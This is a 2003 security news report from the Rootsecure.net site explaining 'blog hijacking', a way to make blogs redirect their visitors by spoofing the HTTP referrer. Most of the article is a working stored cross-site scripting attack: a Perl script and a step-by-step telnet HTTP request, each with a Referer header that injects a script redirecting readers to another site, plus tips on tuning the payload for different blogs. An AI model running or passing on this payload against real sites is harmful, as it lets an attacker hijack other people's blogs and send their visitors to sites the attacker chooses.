R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Sunday, 19th May 2013 @ 17:27:24 GMT 
Rootsecure Homepage
About RootSecure
Lite Edition
User Area
Audio News
Daily Newsletter
Site News Archives
Sources News Archive
SecNews RSS Feeds
SecNews Console
Links:
   Videos
   Security
   Hacking
   Wireless
Downloads:
   Other
   Perl Scripts
   Audio Clips
   Win32 Tools
   Media Archive
   PDF Documents
Reports
Hacker Gear
Win' Error Pic's
ASCII Generator
Your IP Address
RootSecure:
   Contact
   Search
   Publicity
   Affiliates
   Attack Statistics
   Syndication
   (RSS/XML Feed)
   Privacy Policy

Hits: 134,461,428
(Since 06/09/02)
Admin Telnet
HoneyPot Project
Reports | Blog Hijacking
{17th Feb 2003}
Rootsecure.net recently came across this post: http://www.unix-girl.com/blog/archives/000726.html, on how it is possible to hijack blogs, (along with any other site with similar insecure scripts) which was the inspiration for this report.

Referrer spoofing is changing the page that the site you goto thinks you came from, so you're on site A and you click a link on it taking you to site B.  Well your browser will send Site B the location of the page you were just on (Site A).  It has been possible ever since people started using home grown insecure scripts on their pages (ie ones which do not properly filter out HTML tags such as < > " ' & ;) however this is the first time Rootsecure.net has ever heard of the new phenomenon of "blog hijacking©" (spoofing your referrer to a blog so that everyone else that visits it will be redirected to another blog/site of your choice).  It is usually highly-noticeable because of the fact most blogs display referrers on the their home page.

The following Perl script can be used for such a purpose:

    #!usr/bin/perl -w
    print "Content-Type: text/html\n\n";
    my $url = "http://www.example.com";
    use LWP::UserAgent;
    use HTTP::Request::Common qw(GET POST);
    my $agent = LWP::UserAgent->new;
    my $req = GET $url, Referer => "\"></a><script>top.location.href=\'http://ww
	w.someotherblog.com\';</script><a href=\"http://localhost\"";
    #print $agent->request($req)->as_string;
However by far a simpler way is to connect to the website via telnet, which should be readily available on any respectable computer.

  • Open a command windows and type in telnet followed by the name of the site followed by 80, e.g.
    telnet www.example.com 80
    (do not include http://)
  • Type the following into the command window (after changing the host field, and get request) - I would recommend copying the whole lot into notepad, making the changes, then copy/pasting it into the command window.
     
    GET /index.pl HTTP/1.1
Host: example.com
Accept: *.*
User-Agent: Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1)
Referer: http://"></a><script>top.location.href='http://www.someoth
    	erblog.com';</script><a href="http://localhost"
    (Note referrer is all one line, and spelt "Referer")
  • Hit enter twice (the one in the middle of the keyboard, not the one on the number pad)

Note: Other blogs will have implemented their referrer logging scripts in different ways, therefore care is needed to properly end/begin HTML tags.

Update: Blog that was originally hijacked - http://jeremy.zawodny.com/blog/archives/000536.html
Roundup of "Blog-Hijacking" - http://www.notestips.com/80256B3A007F2692/1/NAMO-5KC2YN

Further Update: The Register have picked up the story.